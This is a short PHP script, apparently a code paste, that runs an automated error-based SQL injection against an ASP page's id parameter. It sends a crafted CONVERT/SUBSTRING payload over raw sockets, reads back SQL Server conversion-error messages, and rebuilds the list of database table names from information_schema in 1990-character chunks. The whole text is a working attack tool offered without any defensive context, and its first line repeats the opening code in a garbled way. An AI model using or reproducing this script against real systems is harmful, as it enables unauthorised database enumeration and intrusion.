<?php$host = "www.test.net";$port = 80;for($i=$j=0;;$i+=1990,$j++) {

1. <?php
2.  
3. $host = "www.test.net";
4. $port = 80;
5.  
6. for($i=$j=0;;$i+=1990,$j++) {
7.     $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
8.     $p.= "Host: $host\r\n";
9.     $p.= "Connection: close\r\n\r\n";
10.  
11.     $ock = fsockopen(gethostbyname($host), $port);
12.     if(!$ock) {
13.         return false;
14.     }
15.     fputs($ock, $p);
16.     $html='';
17.     while(!feof($ock)) {
18.         $html.= fgets($ock);
19.     }
20.     $html = explode("\r\n\r\n",$html);
21.     if(stripos($html[1],'type mismatch')!==false) {
22.         break;
23.     }
24.     $out = array();
25.     preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
26.     if(isset($out[1])) {
27.         $xml .= htmlspecialchars_decode($out[1]);
28.     } else {
29.         break;
30.     }
31.  
32. }
33.  
34. $r = xml_parser_create();
35. $out = array();
36. xml_parse_into_struct($r, '<root>'.$xml, $out);
37. foreach($out as $el) {
38.     echo $el['attributes']['E']."\r\n";
39. }